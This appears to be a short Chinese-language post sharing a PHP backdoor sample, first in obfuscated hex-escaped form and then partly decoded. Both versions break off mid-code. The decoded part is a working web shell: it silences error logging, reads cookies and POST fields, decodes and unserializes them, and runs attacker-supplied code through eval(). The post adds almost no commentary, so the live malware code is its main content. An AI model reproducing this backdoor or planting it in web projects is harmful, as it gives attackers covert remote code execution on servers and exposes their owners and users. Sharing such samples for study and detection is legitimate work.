一段加密的后门代码
代码解密:https://malwaredecoder.com/result/fc0d676e44b62985879f8f61a598df7a
一段后门代码:
>16)&255).chr((${${"\x47\x4cOBA\x4c\x53"}["a\x6ee\x64q\x65\x79\x76\x62"]}>>8)&255).chr(${$fyojtix}&255);}return substr(${${"\x47L\x4fBAL\x53"}["\x73\x77z\x6a\x64m\x6dek"]},0,strlen(${${"\x47\x4cO\x42\x41\x4cS"}["\x6a\x69\x68\x6b\x75\x6dy\x72\x6e\x71\x63"]})-strlen(${${"\x47LOB\x41LS"}["\x63\x74\x78\x67vq\x67l\x76\x6fg"]}));}function decode($data,$key){${"\x47L\x4f\x42ALS"}["n\x7a\x78z\x78\x68d\x75i\x77\x66"]="\x69";${"GLO\x42\x41L\x53"}["\x78i\x71\x77\x62\x64k\x77"]="\x6be\x79\x33";${"\x47\x4cOB\x41L\x53"}["h\x78\x6e\x74\x73\x6d"]="\x64\x61\x74a";$nfcrlzoqiyym="\x69";$ofbkzgrupiv="\x6fu\x74\x5fda\x74a";${"GLOB\x41\x4c\x53"}["ei\x61l\x75\x74\x75"]="\x69";${${"\x47L\x4fB\x41\x4cS"}["r\x65d\x73\x6fb\x64g\x66w"]}="0\x38ae\x381a2-\x6545\x31-4\x63\x39\x38-88c\x65-9d2\x32562\x66\x30\x61\x630";${"G\x4c\x4fB\x41L\x53"}["nm\x74ku\x6b\x64\x65"]="\x6f\x75t\x5fda\x74\x61";$eykvvkxfgb="\x69";$hlrlfgf="\x6be\x79";${${"\x47\x4c\x4fBA\x4cS"}["\x77\x64\x6b\x71\x65\x67\x62t\x73"]}=pack("\x48*","0\x34\x35d07\x35\x33\x30\x62\x350\x3035\x3700\x354\x35\x35\x35\x37\x35\x35\x30\x300\x305\x36\x35\x380e\x30\x30\x30\x31\x309500\x31\x3000\x66\x30\x32\x350\x30b\x30\x630\x30\x30\x3751\x3555\x33\x357\x35\x32");${$ofbkzgrupiv}="";${"GL\x4fBA\x4c\x53"}["o\x67y\x63\x73\x66\x71\x70q"]="key\x33";for(${$nfcrlzoqiyym}=0;${${"G\x4c\x4fBA\x4cS"}["n\x7ax\x7ax\x68\x64u\x69\x77\x66"]} ?>
解密后的代码:
${"GLOBALS"}["sprbwloi"]="out_data";${"GLOBALS"}["wdkqegbts"]="key3";${"GLOBALS"}["redsobdgfw"]="key2";${"GLOBALS"}["cxvtsrcwr"]="n";${"GLOBALS"}["udwwxeinjs"]="c";${"GLOBALS"}["ctxgvqglvog"]="p";${"GLOBALS"}["sjhywnh"]="s";${"GLOBALS"}["rdhiivgrm"]="base64inv";${"GLOBALS"}["oimfwpbvs"]="i";${"GLOBALS"}["xefudwekqxr"]="base64chars";${"GLOBALS"}["jkoztogk"]="d";${"GLOBALS"}["jfdubfsy"]="a";${"GLOBALS"}["ppmuyvi"]="r";${"GLOBALS"}["fkmyqex"]="ak";${"GLOBALS"}["nviqphl"]="data";${"GLOBALS"}["qlymokfzoe"]="key";@ini_set("error_log",NULL);@ini_set("log_errors",0);@ini_set("max_execution_time",0);@set_time_limit(0);array_walk($_COOKIE,"enumerator");array_walk($_POST,"enumerator");function enumerator($value,$key){${"GLOBALS"}["wbnrdf"]="data";${"GLOBALS"}["xvswmtvyod"]="value";${${"GLOBALS"}["wbnrdf"]}=@unserialize(decode(get_params(${${"GLOBALS"}["xvswmtvyod"]}),${${"GLOBALS"}["qlymokfzoe"]}));@extract(${${"GLOBALS"}["nviqphl"]});if(isset(${${"GLOBALS"}["fkmyqex"]})){${"GLOBALS"}["kdccuutjccpn"]="r";${${"GLOBALS"}["kdccuutjccpn"]}=array();${"GLOBALS"}["jkblali"]="a";$dnyyrqcjhbg="r";${${"GLOBALS"}["ppmuyvi"]}["sv"]="1.0-3";$kwshfzxow="r";${$dnyyrqcjhbg}["pv"]=PHP_VERSION;if(ord(${${"GLOBALS"}["jfdubfsy"]})==105)echo@serialize(${$kwshfzxow});elseif(ord(${${"GLOBALS"}["jkblali"]})==101)eval(${${"GLOBALS"}["jkoztogk"]});}}function get_params($s){$egmozpvqw="c";$dvhtoerid="base64chars";${"GLOBALS"}["iaktaepzkolt"]="s";${${"GLOBALS"}["xefudwekqxr"]}="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";${"GLOBALS"}["udgmotllrqqy"]="r";$navmbtcm="p";$hbzvyvtkwl="p";$lksboqor="s";${"GLOBALS"}["ncdgqrusodb"]="base64inv";$pjitegq="s";${${"GLOBALS"}["ncdgqrusodb"]}=Array();${"GLOBALS"}["ahrcdhkljchf"]="s";${"GLOBALS"}["swzjdmmek"]="r";for(${${"GLOBALS"}["oimfwpbvs"]}=0;${${"GLOBALS"}["oimfwpbvs"]}